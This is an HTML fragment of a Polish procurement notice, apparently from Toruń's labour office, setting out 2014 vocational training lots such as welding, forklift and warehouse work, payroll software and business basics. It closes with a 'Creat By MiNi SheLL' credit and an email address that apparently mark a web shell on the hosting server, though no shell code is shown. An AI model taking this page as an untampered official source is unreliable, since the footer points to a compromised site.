<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Cel szkolenia: uzyskanie uprawnień do kierowania wózkami jezdniowymi wraz z bezpieczną wymianą butli gazowych tj. uprawnień obowiązujących na terenie każdego zakładu pracy.
2.Ilość godzin zajęć dydaktycznych:  82 godz., w tym 30 godz. zajęć praktycznych w zakresie kierowania wózkami jezdniowymi.
3.Zajęcia praktyczne w zakresie obsługi wózków jezdniowych muszą być przeprowadzone w grupach maksymalnie 3-osobowych. 
4.Liczba uczestników: 2 kursy 15-osobowe (grupy maksymalnie - 15-osobowe, minimalnie - 13-osobowe). Zamawiający przewiduje udzielenie zamówień uzupełniających stanowiących nie więcej niż 50% wartości tego zamówienia.
5.Pożądany termin rozpoczęcia:  I kurs - kwiecień 2014, II kurs - sierpień 2014..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie wykonawcy - 30</li>
<li>3. Posiadanie certyfikatów jakości usług - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Monter instalacji wod-kan-gaz. i c.o. z uprawnieniami spawalniczymi (metoda MAG).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Cel szkolenia: nauczenie montażu instalacji wod.-kan.-gaz. i c.o. oraz uzyskanie uprawnień spawalniczych w zakresie metody MAG.
2.Ilość godzin zajęć dydaktycznych: 200-205.
3.Wymagany zakres tematyczny szkolenia:
- Przygotowanie robót instalacyjnych, wodociągowych, c.o. i kanalizacyjnych na podstawie dokumentacji technicznej,
- BHP,
- Montaż instalacji wodociągowej i c.o. z rur stalowych, miedzianych i z tworzyw sztucznych,
- Montaż armatury łazienkowej, urządzeń sanitarnych i odbiorników ciepła,
- Prace konserwacyjne i naprawcze instalacji wodociągowej, kanalizacyjnej, armatury i instalacji c.o.
- Przepisy w zakresie urządzeń i instalacji gazowych
- Przyłącza urządzeń gazowych,
- Spawanie blach i rur spoinami pachwinowymi metodą MAG - 140-145 godz.
4.Baza szkoleniowa do przeprowadzenia zajęć znajdująca się na terenie Miasta Torunia w szczególności musi być zgodna
- z wymaganiami instytucji uprawnionych do wydawania atestów/certyfikatów  na prowadzenie szkoleń i egzaminów spawaczy, uzyskanych na podstawie wymagań instytucji podległych Ministrowi Gospodarki lub innemu właściwemu,
- z Rozporządzeniem Ministra Gospodarki z 27.04.2000 w sprawie bezpieczeństwa i higieny pracy przy pracach spawalniczych (Dz.U. z 2000 r., Nr 40, poz.470).
Liczba uczestników: maksymalnie - 10, minimalnie - 8 osób..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie wykonawcy - 30</li>
<li>3. Posiadanie certyfikatów jakości usług - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pracownik techniczno-magazynowy z uprawnieniami na wózki jezdniowe i uprawnieniami elektrycznymi do 1 kV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Cel szkolenia: przygotowanie uczestników do pracy na stanowisku pracownika hurtowni, magazynu (z obsługą komputera) oraz uzyskanie uprawnień do kierowania wózkami jezdniowymi wraz z bezpieczną wymianą butli gazowych oraz uprawnień elektrycznych w zakresie eksploatacji do 1 kV. Uprawnienia  do kierowania wózkami jezdniowymi muszą być uprawnieniami obowiązującymi na terenie każdego zakładu pracy.
2.Ilość godzin zajęć dydaktycznych: 160.
3.Wymagany zakres tematyczny szkolenia:
- organizacja pracy w magazynie i hurtowni,
- dokumentacja magazynowa,
- dokumentacja dot. dostawy i sprzedaży
- obsługa komputerowych programów magazynowo-hurtowych  - 20 godz.
- obsługa kas fiskalnych,
- obsługa  wózków jezdniowych z bezpieczną wymianą butli gazowych - 82 godz., w tym 30 godz. zajęć praktycznych w zakresie kierowania wózkami jezdniowymi.
- eksploatacja urządzeń elektrycznych - 40 godz.
4.Zajęcia praktyczne w zakresie obsługi wózków jezdniowych muszą być przeprowadzone w grupach maksymalnie 3-osobowych. 
5.Liczba uczestników: maksymalnie - 15, minimalnie - 13 osób.
6.Pożądany termin rozpoczęcia:  kwiecień 2014..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie wykonawcy - 30</li>
<li>3. Posiadanie certyfikatów jakości usług - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Fakturzysta z obsługą kas fiskalnych i komputerowych programów sprzedaży.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Celem szkolenia jest uzyskanie przez uczestników praktycznych umiejętności z zakresu sprzedaży, obsługi kasy fiskalnej z fakturowaniem komputerowym oraz przestrzeganiem zasad higieny w procesie produkcji żywności i w obrocie żywnością.
2. Liczba osób do przeszkolenia: maksymalnie - 15, minimalnie - 14. 
3. Forma organizacji szkolenia: kurs.
4. Pożądany termin rozpoczęcia i zakończenia szkolenia:  maj 2014..
5. Czas trwania kursu: 3 tygodnie.
6. Wymagana ilość godzin zajęć dydaktycznych - 100. 
7. Wymagany zakres tematyczny szkolenia:
- BHP w handlu, organizacja pracy w placówce handlowej - 6 godz.
- Zasady higieny w procesie produkcji żywności i w obrocie żywnością  - 6 godz.
- Profesjonalna obsługa klienta - 6 godz.
- Realizacja płatności gotówkowych i bezgotówkowych - 8 godz.,
- Obsługa kas fiskalnych i urządzeń współpracujących, terminale kart płatniczych - 24 godz. 
- Fakturowanie komputerowe - obsługa programu informatycznego - 30 godz.,
- Blok aktywnego poszukiwania pracy - 20 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie wykonawcy - 30</li>
<li>3. Posiadanie certyfikatów jakości usług - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Kadry i płace z obsługą programu PŁATNIK i SYMFONIA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Cel szkolenia:  praktyczne przygotowanie  do pracy w charakterze pracownika ds. kadr i płac.
2.Liczba osób do przeszkolenia: maksymalnie - 15, minimalnie - 13. 
3. Forma organizacji szkolenia: kurs.
4. Pożądany termin szkolenia:  maj/czerwiec 2014. 
5. Wymagana ilość godzin zajęć dydaktycznych - 180.
6. Czas trwania kursu: 6 tygodni
7. Wymagany zakres tematyczny szkolenia:
- elementy prawa pracy -  10 godz.
- Dokumentacja pracownicza - 15 godz.
- Płace - sposoby rozliczeń z pracownikami, listy płac, rozliczenia z ZUS i PIT - 40 godz.
- Wynagrodzenia za czas nieobecności w pracy, zasiłki z ubezpieczenia chorobowego - 15 godz.,
- Kadry i płace w ujęciu informatycznym - program Symfonia - 70 godz.,
- Obsługa programu Płatnik - 30 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie wykonawcy - 30</li>
<li>3. Posiadanie certyfikatów jakości usług - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pracownik budowlano-drogowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Cel szkolenia: uzyskanie uprawnień na montaż rusztowań budowlanych metalowych, obsługę przecinarek do nawierzchni dróg, zagęszczarek i ubijaków wibracyjnych.
2.Ilość godzin zajęć dydaktycznych: 130- 140.
3.Liczba osób do przeszkolenia:  8 (maksymalna liczba uczestników - 8, minimalna - 6 osób). Kandydaci będą posiadać orzeczenie lekarskie o braku przeciwwskazań do pracy w zakresie przedmiotu szkolenia.
4.Pożądany termin rozpoczęcia szkolenia:  kwiecień 2014.
5.Czas trwania kursu: 1 miesiąc.
6.Program nauczania musi być zgodny z Wytycznymi Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego oraz Rozporządzeniem Ministra Gospodarki z 20.09.2001 w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz.U. z 2001 r. Nr 118, poz.1263). 
7.Szkolenie kończy się egzaminem zewnętrznym przeprowadzonym przez komisję powołaną przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie wykonawcy - 30</li>
<li>3. Posiadanie certyfikatów jakości usług - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> ABC Biznesu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Celem szkolenia jest wyposażenie skierowanych osób bezrobotnych w wiedzę teoretyczną i praktyczną niezbędną do samodzielnego prowadzenia działalności gospodarczej.
2.Liczba osób do przeszkolenia: maksymalnie 130 osób, minimalnie 110 osób. Zamawiający przewiduje udzielenie zamówień uzupełniających stanowiących nie więcej niż 50% wartości tego zamówienia.
3.Forma organizacji szkolenia: kurs.
4.Liczba kursów (grup):  maksymalnie 11, minimalnie 8.
5.Wielkość grup szkoleniowych -   8-15 osób.
6.Pożądany termin szkolenia:  od kwietnia 2014 do końca 2014 roku.
7.Grupy będą zgłaszane Wykonawcy z co najmniej 2-tygodniowym wyprzedzeniem.
8.Czas trwania szkolenia:  8 kolejnych dni roboczych.
9.Szkolenie skierowane jest głównie do osób bezrobotnych zarejestrowanych w PUP dla Miasta Torunia, które otrzymały pozytywną decyzję o przyznaniu dotacji na działalność gospodarczą.
10.Wymagana ilość godzin dydaktycznych  - 60 godz./os.
11.Wymagany zakres tematyczny szkolenia:
a)	Procedura rejestracyjna firmy oraz formy prowadzenia działalności gospodarczej - 4 godz.,
b)	 Prowadzenie i rozliczanie finansowe działalności gospodarczej - 18 godz.,
c)	 Prawo pracy - 2 godz.,
d)	 Marketing i promocja firmy - relacje z klientem - 2 godz.,
e)	 Negocjacje i etyka biznesowa - 2 godz.,
f)	 Zasady tworzenia biznes planu - 2 godz.
g)	 Komputerowa księga przychodów i rozchodów (warsztaty z komputerem) - 30 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.20.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Kwalifikacje wykładowców - 30</li>
<li>3. Posiadanie certyfikatów jakości usług - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com